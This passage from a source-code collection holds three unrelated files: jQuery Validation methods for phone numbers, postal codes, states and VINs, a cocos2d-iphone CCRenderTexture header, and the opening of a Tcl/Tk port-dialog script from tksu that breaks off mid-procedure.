param );\n}, \"Please enter a different value, values must not be the same.\" );\n\n$.validator.addMethod(\"nowhitespace\", function(value, element) {\n\treturn this.optional(element) || /^\\S+$/i.test(value);\n}, \"No white space please\");\n\n/**\n* Return true if the field value matches the given format RegExp\n*\n* @example $.validator.methods.pattern(\"AR1004\",element,/^AR\\d{4}$/)\n* @result true\n*\n* @example $.validator.methods.pattern(\"BR1004\",element,/^AR\\d{4}$/)\n* @result false\n*\n* @name $.validator.methods.pattern\n* @type Boolean\n* @cat Plugins/Validate/Methods\n*/\n$.validator.addMethod(\"pattern\", function(value, element, param) {\n\tif (this.optional(element)) {\n\t\treturn true;\n\t}\n\tif (typeof param === \"string\") {\n\t\tparam = new RegExp(\"^(?:\" + param + \")$\");\n\t}\n\treturn param.test(value);\n}, \"Invalid 
format.\");\n\n/**\n * Dutch phone numbers have 10 digits (or 11 and start with +31).\n */\n$.validator.addMethod(\"phoneNL\", function(value, element) {\n\treturn this.optional(element) || /^((\\+|00(\\s|\\s?\\-\\s?)?)31(\\s|\\s?\\-\\s?)?(\\(0\\)[\\-\\s]?)?|0)[1-9]((\\s|\\s?\\-\\s?)?[0-9]){8}$/.test(value);\n}, \"Please specify a valid phone number.\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n$.validator.addMethod(\"phoneUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?)|(?:\\(?0))(?:\\d{2}\\)?\\s?\\d{4}\\s?\\d{4}|\\d{3}\\)?\\s?\\d{3}\\s?\\d{3,4}|\\d{4}\\)?\\s?(?:\\d{5}|\\d{3}\\s?\\d{3})|\\d{5}\\)?\\s?\\d{4,5})$/);\n}, \"Please specify a valid phone number\");\n\n/**\n * matches US phone number format\n *\n * where the area code may not start with 1 and the prefix may not start with 1\n * allows '-' or ' ' as a separator and allows parens around area code\n * some people may want to put a '1' in front of their number\n *\n * 1(212)-999-2345 or\n * 212 999 2344 or\n * 212-999-0983\n *\n * but not\n * 111-123-5434\n * and not\n * 212 123 4567\n */\n$.validator.addMethod(\"phoneUS\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\s+/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(\\+?1-?)?(\\([2-9]([02-9]\\d|1[02-9])\\)|[2-9]([02-9]\\d|1[02-9]))-?[2-9]([02-9]\\d|1[02-9])-?\\d{4}$/);\n}, \"Please specify a valid phone number\");\n\n/* For UK phone functions, do the following server side processing:\n * Compare original input with this RegEx pattern:\n * ^\\(?(?:(?:00\\)?[\\s\\-]?\\(?|\\+)(44)\\)?[\\s\\-]?\\(?(?:0\\)?[\\s\\-]?\\(?)?|0)([1-9]\\d{1,4}\\)?[\\s\\d\\-]+)$\n * Extract $1 and set $prefix to '+44' if $1 is '44', otherwise set $prefix to '0'\n * Extract $2 and remove hyphens, spaces and parentheses. 
Phone number is combined $prefix and $2.\n * A number of very detailed GB telephone number RegEx patterns can also be found at:\n * http://www.aa-asterisk.org.uk/index.php/Regular_Expressions_for_Validating_and_Formatting_GB_Telephone_Numbers\n */\n//Matches UK landline + mobile, accepting only 01-3 for landline or 07 for mobile to exclude many premium numbers\n$.validator.addMethod(\"phonesUK\", function(phone_number, element) {\n\tphone_number = phone_number.replace(/\\(|\\)|\\s+|-/g, \"\");\n\treturn this.optional(element) || phone_number.length > 9 &&\n\t\tphone_number.match(/^(?:(?:(?:00\\s?|\\+)44\\s?|0)(?:1\\d{8,9}|[23]\\d{9}|7(?:[1345789]\\d{8}|624\\d{6})))$/);\n}, \"Please specify a valid uk phone number\");\n\n/**\n * Matches a valid Canadian Postal Code\n *\n * @example jQuery.validator.methods.postalCodeCA( \"H0H 0H0\", element )\n * @result true\n *\n * @example jQuery.validator.methods.postalCodeCA( \"H0H0H0\", element )\n * @result false\n *\n * @name jQuery.validator.methods.postalCodeCA\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod( \"postalCodeCA\", function( value, element ) {\n\treturn this.optional( element ) || /^[ABCEGHJKLMNPRSTVXY]\\d[A-Z] \\d[A-Z]\\d$/.test( value );\n}, \"Please specify a valid postal code\" );\n\n/*\n* Valida CEPs do brasileiros:\n*\n* Formatos aceitos:\n* 99999-999\n* 99.999-999\n* 99999999\n*/\n$.validator.addMethod(\"postalcodeBR\", function(cep_value, element) {\n\treturn this.optional(element) || /^\\d{2}.\\d{3}-\\d{3}?$|^\\d{5}-?\\d{3}?$/.test( cep_value );\n}, \"Informe um CEP válido.\");\n\n/* Matches Italian postcode (CAP) */\n$.validator.addMethod(\"postalcodeIT\", function(value, element) {\n\treturn this.optional(element) || /^\\d{5}$/.test(value);\n}, \"Please specify a valid postal code\");\n\n$.validator.addMethod(\"postalcodeNL\", function(value, element) {\n\treturn this.optional(element) || /^[1-9][0-9]{3}\\s?[a-zA-Z]{2}$/.test(value);\n}, \"Please specify a valid postal code\");\n\n// Matches UK postcode. Does not match to UK Channel Islands that have their own postcodes (non standard UK)\n$.validator.addMethod(\"postcodeUK\", function(value, element) {\n\treturn this.optional(element) || /^((([A-PR-UWYZ][0-9])|([A-PR-UWYZ][0-9][0-9])|([A-PR-UWYZ][A-HK-Y][0-9])|([A-PR-UWYZ][A-HK-Y][0-9][0-9])|([A-PR-UWYZ][0-9][A-HJKSTUW])|([A-PR-UWYZ][A-HK-Y][0-9][ABEHMNPRVWXY]))\\s?([0-9][ABD-HJLNP-UW-Z]{2})|(GIR)\\s?(0AA))$/i.test(value);\n}, \"Please specify a valid UK postcode\");\n\n/*\n * Lets you say \"at least X inputs that match selector Y must be filled.\"\n *\n * The end result is that neither of these inputs:\n *\n *\t\n *\t\n *\n *\t...will validate unless at least one of them is filled.\n *\n * partnumber:\t{require_from_group: [1,\".productinfo\"]},\n * description: {require_from_group: [1,\".productinfo\"]}\n *\n * options[0]: number of fields that must be filled in the group\n * options[1]: CSS selector that defines the group of conditionally required fields\n */\n$.validator.addMethod(\"require_from_group\", function(value, element, options) {\n\tvar $fields = $(options[1], element.form),\n\t\t$fieldsFirst = $fields.eq(0),\n\t\tvalidator = $fieldsFirst.data(\"valid_req_grp\") ? 
$fieldsFirst.data(\"valid_req_grp\") : $.extend({}, this),\n\t\tisValid = $fields.filter(function() {\n\t\t\treturn validator.elementValue(this);\n\t\t}).length >= options[0];\n\n\t// Store the cloned validator for future validation\n\t$fieldsFirst.data(\"valid_req_grp\", validator);\n\n\t// If element isn't being validated, run each require_from_group field's validation rules\n\tif (!$(element).data(\"being_validated\")) {\n\t\t$fields.data(\"being_validated\", true);\n\t\t$fields.each(function() {\n\t\t\tvalidator.element(this);\n\t\t});\n\t\t$fields.data(\"being_validated\", false);\n\t}\n\treturn isValid;\n}, $.validator.format(\"Please fill at least {0} of these fields.\"));\n\n/*\n * Lets you say \"either at least X inputs that match selector Y must be filled,\n * OR they must all be skipped (left blank).\"\n *\n * The end result, is that none of these inputs:\n *\n *\t\n *\t\n *\t\n *\n *\t...will validate unless either at least two of them are filled,\n *\tOR none of them are.\n *\n * partnumber:\t{skip_or_fill_minimum: [2,\".productinfo\"]},\n * description: {skip_or_fill_minimum: [2,\".productinfo\"]},\n * color:\t\t{skip_or_fill_minimum: [2,\".productinfo\"]}\n *\n * options[0]: number of fields that must be filled in the group\n * options[1]: CSS selector that defines the group of conditionally required fields\n *\n */\n$.validator.addMethod(\"skip_or_fill_minimum\", function(value, element, options) {\n\tvar $fields = $(options[1], element.form),\n\t\t$fieldsFirst = $fields.eq(0),\n\t\tvalidator = $fieldsFirst.data(\"valid_skip\") ? $fieldsFirst.data(\"valid_skip\") : $.extend({}, this),\n\t\tnumberFilled = $fields.filter(function() {\n\t\t\treturn validator.elementValue(this);\n\t\t}).length,\n\t\tisValid = numberFilled === 0 || numberFilled >= options[0];\n\n\t// Store the cloned validator for future validation\n\t$fieldsFirst.data(\"valid_skip\", validator);\n\n\t// If element isn't being validated, run each skip_or_fill_minimum field's validation rules\n\tif (!$(element).data(\"being_validated\")) {\n\t\t$fields.data(\"being_validated\", true);\n\t\t$fields.each(function() {\n\t\t\tvalidator.element(this);\n\t\t});\n\t\t$fields.data(\"being_validated\", false);\n\t}\n\treturn isValid;\n}, $.validator.format(\"Please either skip these fields or fill at least {0} of them.\"));\n\n/* Validates US States and/or Territories by @jdforsythe\n * Can be case insensitive or require capitalization - default is case insensitive\n * Can include US Territories or not - default does not\n * Can include US Military postal abbreviations (AA, AE, AP) - default does not\n *\n * Note: \"States\" always includes DC (District of Colombia)\n *\n * Usage examples:\n *\n * This is the default - case insensitive, no territories, no military zones\n * stateInput: {\n * caseSensitive: false,\n * includeTerritories: false,\n * includeMilitary: false\n * }\n *\n * Only allow capital letters, no territories, no military zones\n * stateInput: {\n * caseSensitive: false\n * }\n *\n * Case insensitive, include territories but not military zones\n * stateInput: {\n * includeTerritories: true\n * }\n *\n * Only allow capital letters, include territories and military zones\n * stateInput: {\n * caseSensitive: true,\n * includeTerritories: true,\n * includeMilitary: true\n * }\n *\n *\n *\n */\n\n$.validator.addMethod(\"stateUS\", function(value, element, options) {\n\tvar isDefault = typeof options === \"undefined\",\n\t\tcaseSensitive = ( isDefault || typeof options.caseSensitive === \"undefined\" ) ? 
false : options.caseSensitive,\n\t\tincludeTerritories = ( isDefault || typeof options.includeTerritories === \"undefined\" ) ? false : options.includeTerritories,\n\t\tincludeMilitary = ( isDefault || typeof options.includeMilitary === \"undefined\" ) ? false : options.includeMilitary,\n\t\tregex;\n\n\tif (!includeTerritories && !includeMilitary) {\n\t\tregex = \"^(A[KLRZ]|C[AOT]|D[CE]|FL|GA|HI|I[ADLN]|K[SY]|LA|M[ADEINOST]|N[CDEHJMVY]|O[HKR]|PA|RI|S[CD]|T[NX]|UT|V[AT]|W[AIVY])$\";\n\t} else if (includeTerritories && includeMilitary) {\n\t\tregex = \"^(A[AEKLPRSZ]|C[AOT]|D[CE]|FL|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEINOPST]|N[CDEHJMVY]|O[HKR]|P[AR]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])$\";\n\t} else if (includeTerritories) {\n\t\tregex = \"^(A[KLRSZ]|C[AOT]|D[CE]|FL|G[AU]|HI|I[ADLN]|K[SY]|LA|M[ADEINOPST]|N[CDEHJMVY]|O[HKR]|P[AR]|RI|S[CD]|T[NX]|UT|V[AIT]|W[AIVY])$\";\n\t} else {\n\t\tregex = \"^(A[AEKLPRZ]|C[AOT]|D[CE]|FL|GA|HI|I[ADLN]|K[SY]|LA|M[ADEINOST]|N[CDEHJMVY]|O[HKR]|PA|RI|S[CD]|T[NX]|UT|V[AT]|W[AIVY])$\";\n\t}\n\n\tregex = caseSensitive ? new RegExp(regex) : new RegExp(regex, \"i\");\n\treturn this.optional(element) || regex.test(value);\n},\n\"Please specify a valid state\");\n\n// TODO check if value starts with <, otherwise don't try stripping anything\n$.validator.addMethod(\"strippedminlength\", function(value, element, param) {\n\treturn $(value).text().length >= param;\n}, $.validator.format(\"Please enter at least {0} characters\"));\n\n$.validator.addMethod(\"time\", function(value, element) {\n\treturn this.optional(element) || /^([01]\\d|2[0-3]|[0-9])(:[0-5]\\d){1,2}$/.test(value);\n}, \"Please enter a valid time, between 00:00 and 23:59\");\n\n$.validator.addMethod(\"time12h\", function(value, element) {\n\treturn this.optional(element) || /^((0?[1-9]|1[012])(:[0-5]\\d){1,2}(\\ ?[AP]M))$/i.test(value);\n}, \"Please enter a valid time in 12-hour am/pm format\");\n\n// same as url, but TLD is optional\n$.validator.addMethod(\"url2\", function(value, element) {\n\treturn this.optional(element) || /^(https?|ftp):\\/\\/(((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:)*@)?(((\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d|[1-9]\\d|1\\d\\d|2[0-4]\\d|25[0-5]))|((([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])*([a-z]|\\d|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])))\\.)*(([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])*([a-z]|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])))\\.?)(:\\d*)?)(\\/((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)+(\\/(([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)*)*)?)?(\\?((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)|[\\uE000-\\uF8FF]|\\/|\\?)*)?(#((([a-z]|\\d|-|\\.|_|~|[\\u00A0-\\uD7FF\\uF900-\\uFDCF\\uFDF0-\\uFFEF])|(%[\\da-f]{2})|[!\\$&'\\(\\)\\*\\+,;=]|:|@)|\\/|\\?)*)?$/i.test(value);\n}, $.validator.messages.url);\n\n/**\n * Return true, if the value is a valid vehicle identification number (VIN).\n *\n * Works with all kind of text 
inputs.\n *\n * @example \n * @desc Declares a required input element whose value must be a valid vehicle identification number.\n *\n * @name $.validator.methods.vinUS\n * @type Boolean\n * @cat Plugins/Validate/Methods\n */\n$.validator.addMethod(\"vinUS\", function(v) {\n\tif (v.length !== 17) {\n\t\treturn false;\n\t}\n\n\tvar LL = [ \"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \"M\", \"N\", \"P\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\" ],\n\t\tVL = [ 1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5, 7, 9, 2, 3, 4, 5, 6, 7, 8, 9 ],\n\t\tFL = [ 8, 7, 6, 5, 4, 3, 2, 10, 0, 9, 8, 7, 6, 5, 4, 3, 2 ],\n\t\trs = 0,\n\t\ti, n, d, f, cd, cdv;\n\n\tfor (i = 0; i < 17; i++) {\n\t\tf = FL[i];\n\t\td = v.slice(i, i + 1);\n\t\tif (i === 8) {\n\t\t\tcdv = d;\n\t\t}\n\t\tif (!isNaN(d)) {\n\t\t\td *= f;\n\t\t} else {\n\t\t\tfor (n = 0; n < LL.length; n++) {\n\t\t\t\tif (d.toUpperCase() === LL[n]) {\n\t\t\t\t\td = VL[n];\n\t\t\t\t\td *= f;\n\t\t\t\t\tif (isNaN(cdv) && n === 8) {\n\t\t\t\t\t\tcdv = LL[n];\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\trs += d;\n\t}\n\tcd = rs % 11;\n\tif (cd === 10) {\n\t\tcd = \"X\";\n\t}\n\tif (cd === cdv) {\n\t\treturn true;\n\t}\n\treturn false;\n}, \"The specified vehicle identification number (VIN) is invalid.\");\n\n$.validator.addMethod(\"zipcodeUS\", function(value, element) {\n\treturn this.optional(element) || /^\\d{5}(-\\d{4})?$/.test(value);\n}, \"The specified US ZIP Code is invalid\");\n\n$.validator.addMethod(\"ziprange\", function(value, element) {\n\treturn this.optional(element) || /^90[2-5]\\d\\{2\\}-\\d{4}$/.test(value);\n}, \"Your ZIP-code must be in the range 902xx-xxxx to 905xx-xxxx\");\n\n}));"} {"text": "/*\n * cocos2d for iPhone: http://www.cocos2d-iphone.org\n *\n * Copyright (c) 2009 Jason Booth\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n * \n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n * \n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n *\n */\n\n#import \n#import \"CCNode.h\"\n#import \"CCSprite.h\"\n#import \"Support/OpenGL_Internal.h\"\n\n#import \n#ifdef __IPHONE_OS_VERSION_MAX_ALLOWED\n#import \n#endif // iPHone\n\nenum \n{\n\tkCCImageFormatJPG = 0,\n\tkCCImageFormatPNG = 1,\n\tkCCImageFormatRawData =2\n};\n\n\n/**\n CCRenderTexture is a generic rendering target. To render things into it,\n simply construct a render target, call begin on it, call visit on any cocos\n scenes or objects to render them, and call end. 
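 A minimal sketch of that flow (the node name myNode is a placeholder here, not something declared in this header):\n\n\tCCRenderTexture* rt = [CCRenderTexture renderTextureWithWidth:256 height:256];\n\t[rt begin];\n\t[myNode visit];\t// draw the node and its children into the texture\n\t[rt end];\n\n 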
For convenience, render texture\n adds a sprite as its display child with the results, so you can simply add\n the render texture to your scene and treat it like any other CocosNode.\n There are also functions for saving the render texture to disk in PNG or JPG format.\n \n @since v0.8.1\n */\n@interface CCRenderTexture : CCNode \n{\n\tGLuint\t\t\t\tfbo_;\n\tGLint\t\t\t\toldFBO_;\n\tCCTexture2D*\t\ttexture_;\n\tCCSprite*\t\t\tsprite_;\n\t\n\tGLenum\t\t\t\tpixelFormat_;\n\tGLfloat\t\t\t\tclearColor_[4];\n\n}\n\n/** The CCSprite being used.\n The sprite, by default, will use the following blending function: GL_ONE, GL_ONE_MINUS_SRC_ALPHA.\n The blending function can be changed at runtime by calling:\n\t- [[renderTexture sprite] setBlendFunc:(ccBlendFunc){GL_ONE, GL_ONE_MINUS_SRC_ALPHA}];\n*/\n@property (nonatomic,readwrite, assign) CCSprite* sprite;\n\n/** creates a RenderTexture object with width and height in Points and a pixel format, only RGB and RGBA formats are valid */\n+(id)renderTextureWithWidth:(int)w height:(int)h pixelFormat:(CCTexture2DPixelFormat) format;\n\n/** creates a RenderTexture object with width and height in Points, pixel format is RGBA8888 */\n+(id)renderTextureWithWidth:(int)w height:(int)h;\n\n/** initializes a RenderTexture object with width and height in Points and a pixel format, only RGB and RGBA formats are valid */\n-(id)initWithWidth:(int)w height:(int)h pixelFormat:(CCTexture2DPixelFormat) format;\n\n/** starts grabbing */\n-(void)begin;\n\n/** starts rendering to the texture while clearing the texture first.\n This is more efficient than calling -clear first and then -begin */\n-(void)beginWithClear:(float)r g:(float)g b:(float)b a:(float)a;\n\n/** ends grabbing */\n-(void)end;\n\n/** clears the texture with a color */\n-(void)clear:(float)r g:(float)g b:(float)b a:(float)a;\n\n#ifdef __IPHONE_OS_VERSION_MAX_ALLOWED\n\n/** saves the texture into a file */\n-(BOOL)saveBuffer:(NSString*)name;\n/** saves the texture into a file. The format can be JPG or PNG */\n-(BOOL)saveBuffer:(NSString*)name format:(int)format;\n/* get buffer as UIImage, can only save a render buffer which has a RGBA8888 pixel format */\n-(NSData*)getUIImageAsDataFromBuffer:(int) format;\n\n#endif // __IPHONE_OS_VERSION_MAX_ALLOWED\n\n@end\n\n\n"} {"text": "# Port.tcl --\n#\n#\tTksu procedures to handle the port dialog window.\n#\n# Copyright (C) 2002 Henry Thorson Consulting. All rights reserved.\n#\n# This program is licensed under the terms of the GNU General Public License,\n# version 2 (or any later version). 
See the file `COPYING' for full details,\n# and for a DISCLAIMER OF ALL WARRANTIES.\n#\n# CVS: $Id: Port.tcl,v 1.1.1.1 2002/06/07 23:43:30 jeff Exp $\n\n#-------------------------------------------------------------------------------\n# CreatePortDialog -- create port dialog.\n#\n# Args: instance\tInstance number of parameter list window.\n# Returns: null\n#\n# The parameter and port dialogs share the space below the parameter listbox\n# in the parameter list window.\n#-------------------------------------------------------------------------------\n\nproc tksu::CreatePortDialog instance {\n variable PortAction\n\n# Variable PortAction($instance) is referenced by the radio buttons.\n# It may take on the values {pipe file temp}.\n\n set PortAction($instance) pipe\n set bwid 5\n set lwid 10\n\n set w .param$instance.port\n frame $w\n label $w.title\n\n# Port action: pipe.\n\n set f $w.pipe\n frame $f\n label $f.label -text \" 1\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value pipe\n entry $f.module -relief sunken -bg white -width 14 -exportselection 0\n button $f.moduleB -image DownArrow \\\n \t\t -command \"tksu::PipeModules $instance\"\n\n label $f.portlabel -text \" port:\"\n entry $f.port -relief sunken -bg white -width 10 -exportselection 0\n button $f.portB -image DownArrow \\\n \t\t -command \"tksu::PipePorts $instance\"\n\n# Port action: file.\n\n set f $w.file\n frame $f\n label $f.label -text \" 2\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value file\n entry $f.entry -relief sunken -bg white -exportselection 0\n\n# Port action: temporary or null I/O.\n\n set f $w.temp\n frame $f\n label $f.label -text \" 3\" -underline 1\n radiobutton $f.button -anchor w \\\n \t\t\t -command \"tksu::PortToggle $instance\" \\\n \t\t\t -variable tksu::PortAction($instance) -value temp\n button $w.fileDialog -text File -underline 0 -width 3 \\\n\t\t\t -command \"tksu::PortFile $instance\"\n\n# Port default:\n\n set f $w.default\n frame $f\n label $f.label -text Default: -width $lwid -anchor w\n label $f.value -anchor w -justify left -wraplength 12c\n\n# Port data type:\n\n set f $w.data\n frame $f\n label $f.label -text \"File Type:\" -width $lwid -anchor w\n label $f.value -anchor w\n button $f.color -relief sunken -foreground white -width $bwid \\\n \t\t -takefocus 0\n\n# Port description:\n\n set f $w.desc\n frame $f\n label $f.label -text Description: -width $lwid -anchor w\n label $f.value -anchor w -justify left -wraplength 14c\n\n# Side buttons:\n#\n# DISABLED 5/3/02: \"-command ParamUndo $instance\" replaced with\n# \"-command Undo\", likewise for \"-command ParamRedo $instance\".\n\n button $w.enter -text Enter -underline 0 -width $bwid \\\n \t\t -command \"tksu::ParamEnter $instance\"\n button $w.undo -text Undo -underline 0 -width $bwid \\\n \t\t -command tksu::Undo\n button $w.redo -text Redo -underline 0 -width $bwid \\\n \t\t -command tksu::Redo\n button $w.clear -text Default -underline 0 -width $bwid \\\n \t\t -command \"tksu::ParamClear $instance\"\n\n# Pack up all objects.\n\n pack $w.title -side top -fill x\n\n pack $w.pipe.label $w.pipe.button -side left\n pack $w.enter -padx 10 -side right -in $w.pipe\n pack $w.pipe.portB $w.pipe.port $w.pipe.portlabel -side right\n pack $w.pipe.moduleB -side right\n pack $w.pipe.module -fill x -pady 2\n pack $w.pipe -side top -fill 
x\n\n pack $w.file.label $w.file.button -side left\n pack $w.undo -padx 10 -side right -in $w.file\n pack $w.file.entry -fill x -pady 2\n pack $w.file -side top -fill x\n\n pack $w.temp.label $w.temp.button -side left\n pack $w.redo -padx 10 -side right -in $w.temp\n pack $w.fileDialog -side right -in $w.temp\n pack $w.temp -side top -fill x\n\n pack $w.default.label -side left -padx 2\n pack $w.clear -padx 10 -side right -in $w.default\n pack $w.default.value -side left -padx 2 -anchor w -fill x -expand 1\n pack $w.default -side top -fill x\n\n pack $w.data.label $w.data.value -side left -padx 2\n pack $w.data.color -padx 10 -side right\n pack $w.data -side top -fill x\n\n pack $w.desc.label -side left -padx 2 -anchor nw\n pack $w.desc.value -side left -padx 2 -anchor nw -fill x -expand 1\n pack $w.desc -pady 4 -side top -anchor n -fill x\n\n pack $w -side bottom -fill x\n\n# Accelerator bindings:\n\n set f .param$instance\n bind $f \"$w.pipe.button invoke\"\n bind $f \"$w.file.button invoke\"\n bind $f \"$w.temp.button invoke\"\n bind $f \"$w.fileDialog invoke\"\n\n# These bindings apply to both param and port dialogs:\n\n bind $f \"tksu::ParamEnter $instance\"\n bind $f tksu::Undo\n bind $f tksu::Redo\n bind $f \"tksu::ParamClear $instance\"\n return\n}\n\n#-------------------------------------------------------------------------------\n# LoadPortDialog -- load settings for given port into parameter dialog.\n#\n# Args: instance\tInstance number of parameter list window.\n#\t nlist\tPort name structure, a list in the format\n#\t\t\t{ genericName dataType rw default description }.\n#\t\t\tSee LoadSpecs for more details. nlist is usually\n#\t\t\tstored in the Ports array.\n#\t vlist\tPort value structure, a list in the format\n#\t\t\t{ port-or-param genericName name value undo redo }.\n#\t\t\tSee ParamList for more details. 
vlist is usually\n#\t\t\tstored in the Values array.\n# Returns: null\n#\n# The port value may be in one of the following formats:\n#\n# pipe\t\tAn unconnected pipe.\n# {pipe id ...}\tThe port has one or more pipes connected to it.\n#\t\t\tThe id's are indexes into the Links array.\n# {pipe module port}\tAfter the user has made changes in the port dialog,\n#\t\t\tand before the value has been verified and saved to\n#\t\t\tValues, this form holds the request to\n#\t\t\tcreate a link to the given module and port name.\n# file\t\tAn unconnected file port.\n# {file filename}\tA file port, read or write to filename.\n# temp\t\tA temp port, read DevZero or write DevNull.\n#\n#-------------------------------------------------------------------------------\n\nproc tksu::LoadPortDialog {instance nlist vlist} {\n variable CurrentModule\n variable CurrentParam\n variable CurrentValue\n variable LongDefault\n variable LongDesc\n variable PortAction\n variable Instances\n variable Color\n\n set portName [lindex $nlist 0]\n set portType [lindex $nlist 1]\n set portDir [lindex $nlist 2]\n set portDefault [lindex $nlist 3]\n set portDesc [lrange $nlist 4 end]\n\n# If entry widgets are linked to an EnumList window, unlink them.\n\n UnlinkEntries $instance\n set CurrentParam($instance) $nlist\n set CurrentValue($instance) $vlist\n\n set w .param$instance.port\n\n# Set initial focus to pipe module button or file entry.\n\n set module $CurrentModule($instance)\n set modbase [ModBase $module]\n set f [focus]\n\n if {$f != \".param$instance.list\" && $f != \".param$instance.scroll\"} {\n\tif [info exists Instances($module)] {\n\t set focusee $w.pipe.moduleB\n\t} else {\n\t set focusee $w.file.entry\n\t}\n \tfocus $focusee\n\tif {[focus] != $focusee} update\n }\n $w.file.entry configure -state normal\n $w.file.entry delete 0 end\n\n# Set label titles according to dir: `r' for read-only, `w' for write-only,\n# or `rw' for file read-write.\n\n switch -- $portDir {\n\n\t\"r\" {\n\n# Input port:\n\n\t $w.title configure -text \"Input port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe from module:\" -state normal\n\t $w.file.button configure -text \"Read from file:\"\n\t $w.temp.button configure -text \"Read zeros\"\n\t}\n\t\"w\" {\n\n# Output port:\n\n\t $w.title configure -text \"Output port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe to module:\" -state normal\n\t $w.file.button configure -text \"Write to file:\"\n\t $w.temp.button configure -text \"Discard output\"\n\t}\n\t\"rw\" {\n\n# Read-write port:\n\n\t $w.title configure -text \"Random access port `$portName'\"\n\t $w.pipe.button configure -text \"Pipe to module:\" -state disabled\n\t $w.file.button configure -text \"Read/write file:\"\n\t $w.temp.button configure -text \"Read/write temporary file\"\n\t}\n }\n\n# Load port entry widgets and set radiobuttons.\n\n set value [lindex $vlist 3]\n LoadPortValue $instance $value\n\n# File type description.\n\n set desc [EnumDesc enum-file $portType]\n if {[llength $desc] <= 0} {\n\tset desc \"unknown\"\n }\n $w.data.value configure -text [format \"%s (type `%s')\" $desc $portType]\n $w.data.color configure -background $Color($portType) -text $portType \\\n \t\t\t -activebackground $Color($portType)\n\n# Default description.\n\n if [info exists LongDefault($modbase,$portName)] {\n\tset desc $LongDefault($modbase,$portName)\n } else {\n\tset desc [DefaultValue long $portDefault]\n }\n set wraplength [expr [winfo width $w.default.value] - 40]\n if {$wraplength < 100} {\n \tset wraplength 12c\n 
